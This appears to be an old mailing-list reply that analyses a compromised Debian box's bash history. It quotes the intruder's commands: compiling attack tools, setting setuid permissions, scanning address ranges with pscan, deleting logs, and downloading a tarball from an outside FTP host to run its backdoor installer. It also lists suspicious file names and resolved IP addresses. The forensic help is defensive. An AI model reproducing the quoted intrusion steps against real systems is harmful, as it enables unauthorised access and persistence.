if you run updatedb via cron (or run it from the shell by hand
recently) it'll tell you if you have any of the evil files
on your computer:
locate pscan
locate wuftp
locate bnc2
locate .shit
locate anatomy
locate kod
locate '/b$'
if you find any source files (*.c or *.pl) consider finding a
debian guru to hand them to in case this kind of thing can be
snuffed in the future. might help, you never know.
here's my run thru the command history...
>cd /
>cd home
>cd .dead
>mkdir .dead
>cd .dead
somehow, your invader transferred some files here into
the /home/.dead/ at this point. must've used his own
ftp client, meaning he used your server--on my debian
box the FTP transfers are logged in
/var/log/xferlog
see if you've still got yours. it might help.
>cc anatomy.c -o anatomy
>cc kod.c -o kofd
i'd guess that 'anatomy' scans your directory tree
and reports it back to the IP supplied as its
command-line argument. or it may copy everything.
maybe it scans the structure of the remote site.
don't know. (you may still have the source code;
if so, it might be helpful to hand it off to
some of the C++ gurus around here so they can
wedge it out of existence...)
>cp kofd kod
>rm kofd
hmm! he never directly called kod, but some of the other
programs may have.
>cd home
>cd httpd
>cd icons
>cd small
>cd .shit
looks like cut & paste, and maybe the last two didn't take.
>mkdir small
>cd small
>mkdir .shit
>cd .shit
so i guess he's now at /home/httpd/icons/small/.shit
>who
unless there's a logout and login to another directory,
more files were transferred here somehow.
>chmod 777 *
>chmod +s *
>chmod 666 *
>chmod 777 *
>./pscan
>./b
>./pscan 167.64 111
and it looks like PSCAN does a whole zone at a time.
to what end, i don't know.
down a bit, there's
>./pscan 198.138 111
>cat wuftp.log
>rm wuftp.log
>./pscan 198.59 111
>cat wuftp.log
so the PSCAN program creates "wuftp.log" i guess.
of course, he zapped it before checking out.
i'd bet it was in home/httpd/icons/small/.shit/
along with some other files... may still be there.
seemed to run the PSCAN on an ip net range, then check
the wuftp log file, apparently to get other IP ranges
to scan. ?
(you might try seeing if there's any left on the system.
may be informative.)
now THIS part i would consider very bad news:
>ftp columbia.digiweb.com
[obviously transferring linux kernel here]
>tar -zxvf linux.tar.gz
>cd .bd
>./install
(i know, it's all bad news, but some is badder than others.)
there's also a
>telnet 198.150.93.205
which reports as nonexistent just now, so it's probably a
transient or dynamically-allocated ppp-like address.
===
to find the where the IP's are he/she was interested in,
(in case it helps any, or you want to contact their
sysadmins) i did this in tcsh:
% grep anatomy bash_history.txt | cut -f2 "-d "
216.209.196.154
216.209.205.68
216.209.207.150
212.1.128.61
212.1.128.61
% foreach x(`!!`)
foreach x ( `grep anatomy bash_history.txt | cut -f2 "-d "` )
foreach? nslookup $x
foreach? end
Name: HSE-Montreal-ppp33164.qc.sympatico.ca
Address: 216.209.196.154
Name: HSE-Montreal-ppp35364.qc.sympatico.ca
Address: 216.209.205.68
Name: HSE-Quebec-City-ppp35954.qc.sympatico.ca
Address: 216.209.207.150
Name: cache-1.www.telinco.net
Address: 212.1.128.61
Name: cache-1.www.telinco.net
Address: 212.1.128.61
maybe he/she had some friends in canada...?
and for the "./b" program:
foreach x ( `grep /b bash_history.txt | cut -f2 "-d " | sort | uniq` )
foreach? nslookup $x >> bash_crack
foreach? end
*** localhost can't find 156.26.120.34: Non-existent host/domain
*** localhost can't find 192.203.80.144: Non-existent host/domain
*** localhost can't find 198.150.93.205: Non-existent host/domain
*** localhost can't find 198.247.5.164: Non-existent host/domain
*** localhost can't find 204.116.202.5: Non-existent host/domain
*** localhost can't find 204.185.91.12: Non-existent host/domain
*** localhost can't find 206.252.255.42: Non-existent host/domain
*** localhost can't find 208.135.205.67: Non-existent host/domain
*** localhost can't find e150.135.112.129: Non-existent host/domain
Name: netman.net.okstate.edu
Address: 139.78.100.200
Name: www.safarir.com
Address: 142.169.8.215
Name: midian.arc.nasa.gov
Address: 143.232.55.1
Name: Westgate-AStar-OC3.Telcom.Arizona.EDU
Address: 150.135.112.129
Name: bccs.sunybroome.edu
Address: 192.203.130.28
Name: amber.inr.ac.ru
Address: 192.203.80.142
Name: photon.inr.ruhep.ru
Address: 192.203.80.149
Name: Galahad.Camelot.com
Address: 192.55.203.135
Name: atmr-ulcc.lmn.net.uk
Address: 194.83.100.85
Name: surw.chel.su
Address: 195.54.2.162
Name: gw.daily.ru
Address: 195.54.221.21
Name: tisa.alias.ru
Address: 195.54.29.7
Name: optima.mgn.chel.su
Address: 195.54.3.134
Name: ocotillo.sfps.k12.nm.us
Address: 198.59.112.9
Name: hebi.swcp.com
Address: 198.59.115.35
Name: brahe.phys.unm.edu
Address: 198.59.169.11
Name: rcde19.arc.unm.edu
Address: 198.59.173.186
Name: uofr-vbns1.nysernet.net
Address: 199.109.4.21
Name: ls1010.nswrno.net.au
Address: 203.15.123.146
Name: dsl.three.lorettotel.net
Address: 204.116.104.205
Name: dslhp-100.dsl.nstelco.com
Address: 204.116.30.166
Name: www.centralia.k12.mo.us
Address: 204.185.56.250
Name: pagis.kings.edu
Address: 205.238.205.10
Name: svcr-adsl-205-238-238-112.epix.net
Address: 205.238.238.112
Name: alborada-119.pangeatech.primenet.com
Address: 206.132.219.119
Name: alborada-170.pangeatech.primenet.com
Address: 206.132.219.170
Name: reserved-34-52.cybercowboys.com
Address: 206.132.34.52
Name: t1-t3-dsl.com
Address: 216.156.219.216
Name: www.cqhost.com
Address: 216.167.50.150
Name: telesync.com
Address: 207.69.134.42
Aliases: www.telesync.com
===
sorry this happened! hopefully your troubles can help us all
avoid it in the future... do you have any idea how they originally
got in?
